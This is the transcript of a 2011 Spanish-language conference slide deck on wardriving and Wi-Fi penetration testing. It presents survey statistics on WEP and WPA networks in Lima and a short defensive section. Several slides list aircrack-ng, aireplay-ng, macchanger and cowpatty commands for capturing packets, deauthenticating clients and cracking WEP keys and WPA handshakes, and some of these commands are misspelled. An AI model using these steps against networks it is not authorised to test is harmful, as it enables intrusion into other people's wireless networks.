Top Banner
25

Wardriving Wireless Penetration Testing

Dec 25, 2015

Download

Documents

Wardriving Wireless Penetration Testing Lima Hack 2011
Welcome message from author
This document is posted to help you gain knowledge. Please leave a comment to let me know what you think about it! Share it to your friends and learn new things together.
Transcript
Page 1: Wardriving Wireless Penetration Testing
Page 2: Wardriving Wireless Penetration Testing
Page 3: Wardriving Wireless Penetration Testing

Omar Palomino - CEH Consultor en Seguridad de Información

Page 4: Wardriving Wireless Penetration Testing

aula H4XOR O

mar Palo

min

o

Wardriving and wireless

penetration testing

Estadísticas de seguridad en Lima Metropolitana Técnicas para penetrar redes WEP Técnicas para penetrar redes WPA Demostración en vivo

Page 5: Wardriving Wireless Penetration Testing

¿Quién soy?

• Ing. Sistemas y Maestrista de Ing. de Computación y Sistemas

• Consultor en Seguridad de información - Digiware, CEH

• “10 años” de experiencia en seguridad de información

• Psicólogo que aun no comienza sus estudios….

• Escritor en mis tiempos libres:

http://www.el-palomo.com

Page 6: Wardriving Wireless Penetration Testing

¿Qué es Wardriving?

Es la búsqueda de redes inalámbricas Wi-Fi desde un

vehículo en movimiento. Cuando se realiza la misma

actividad caminando se le llama “warwalking”.

Page 7: Wardriving Wireless Penetration Testing

¿Qué es Wardriving?

Los hackers pintaban señales en las calles para “documentar”

las redes encontradas.

Page 8: Wardriving Wireless Penetration Testing

¿Nunca has visto esos símbolos?

En la actualidad se usan dispositivos GPS y GoogleEarth

para documentar las redes encontradas.

Page 9: Wardriving Wireless Penetration Testing

¿Nunca has visto esos símbolos?

Page 10: Wardriving Wireless Penetration Testing

¿Nunca has visto esos símbolos?

Inicio del proyecto: 01 Abril, 2011

Distritos:

Cercado Callao

San Isidro

San Miguel

Miraflores

La Molina

Los Olivos

San Borja

Page 11: Wardriving Wireless Penetration Testing

Proyecto Wardriving

Page 12: Wardriving Wireless Penetration Testing

Proyecto Wardriving

70%

29%

1%

Redes WiFi – Lima Metropolitana

WEP WPA Abiertas

WEP: 28 531 redes

WPA :11 713 redes

Abiertas: 322 redes

Page 13: Wardriving Wireless Penetration Testing

Proyecto Wardriving

DEMOSTRACIÓN DE

WARDRIVING

Page 14: Wardriving Wireless Penetration Testing

¿Es posible hackear redes WIFI?

WIRELESS

WEP WAP

• Sí, se puede hackear.

• Capturar 40 mil – 120 mil paquetes

• Tarda entre 10 min – 20 min

• Depende de la complejidad de la contraseña.

• Rainbow tables

• Tiempo indeterminado

Page 15: Wardriving Wireless Penetration Testing

Características WEP

RC4 = Rivest Cipher #4

Ataques FMS optimizado H1KARI

Ataques KoreK (IVs únicos)

2004 se publica Aircrack poniendo en práctica los ataques KoreK

La incorporación de inyección de paquetes mejoro sustancialmente los tiempos

Page 16: Wardriving Wireless Penetration Testing

Características WPA

WPA WPA2

Modo Enterprise Autenticación 802.1X / EAP Autenticación 802.1x / EAP

Encriptación TPKI / MIC Encriptación AES - CCMP

Modo Personal Autenticación: PSK Autenticación: PSK

Encriptación TPKI / MIC Encriptación AES - CCMP

Page 17: Wardriving Wireless Penetration Testing

Vulnerando redes WEP

Vamos a la

práctica – en vivo

Page 18: Wardriving Wireless Penetration Testing

Vulnerando redes WEP

Capturando paquetes

Shell# Airmong –ng

Shell# macchanger –mac 00:11:22:33:44:55

Shell# airmong start wlan0 <channel>

Shell# airodump-ng mon0

Shell# airodump-ng –c <channel> -w <file> --bssid <bssid> mon0

Inyectando paquetes

Shell# aireplay-ng -1 0 –a <bssid> -h 00:11:22:33:44:55 mon0

Shell# aireplay-ng -3 –b <bssid> -h 00:11:22:33:44:55 mon0

Obteniendo la contraseña

Shell# aircrak-ng –b <bssid> <file.cap>

Page 19: Wardriving Wireless Penetration Testing

Vulnerando redes WEP

Page 20: Wardriving Wireless Penetration Testing

Vulnerando redes WPA

Vamos a la

práctica – en vivo

Page 21: Wardriving Wireless Penetration Testing

Vulnerando redes WPA

Capturamos sólo el Handshake

Ataque 0 – deautenticación

Shell# aireplay –0 5 –a 00:30:BD:98:CE:62 –C 00:15:E9:B1:33:53 mon0

-0 = ataque de des-autenticación

5 = número de segundos que durará el ataque

-a = BSSID del AP

-c = mac del cliente

PSK= PMK = PBKDF2 (frase, SSID, longitud SSID 4096,256)

Page 22: Wardriving Wireless Penetration Testing

Vulnerando redes WPA

Comprobamos que hemos capturado el handshake:

Shell# aircrak-ng <file.cap>

Necesitamos un

diccionario!

Page 23: Wardriving Wireless Penetration Testing

3 Métodos de craking

1. Aircrack + Diccionario

Shell# aircrak-ng –w <diccionario_ruta> <handshake.cap>

2. Cowpatty + Diccionario (excesivo procesamiento)

Shell# cowpatty –f <diccionario_ruta> -r <handshake.cap> -s SSID

3. Cowpatty + genpmk (muy rápido, 20000 palabras por segundo)

Shell# genpmk –f <diccionario_ruta> -d HASHFILE –s SSID

Shell# cowpatty –r <handshake.cap> -d HASHFILE –s SSID

Page 24: Wardriving Wireless Penetration Testing

¿Cómo evito que me hackeen?

Olvídate de WEP, ni siquiera lo pienses!! Sí, a ti te digo!

Utiliza WPA con una contraseña con criterios de dificultad

Filtrado MAC y ocultar el SSID, tampoco lo pienses!

“Existen algunas soluciones que brindan WIDS/WIPS”

Page 25: Wardriving Wireless Penetration Testing

Gracias por participar muy pronto estamos en provincias

para más información ingresa a nuestra web

En el 2012 mucho más de nosotros…

[email protected]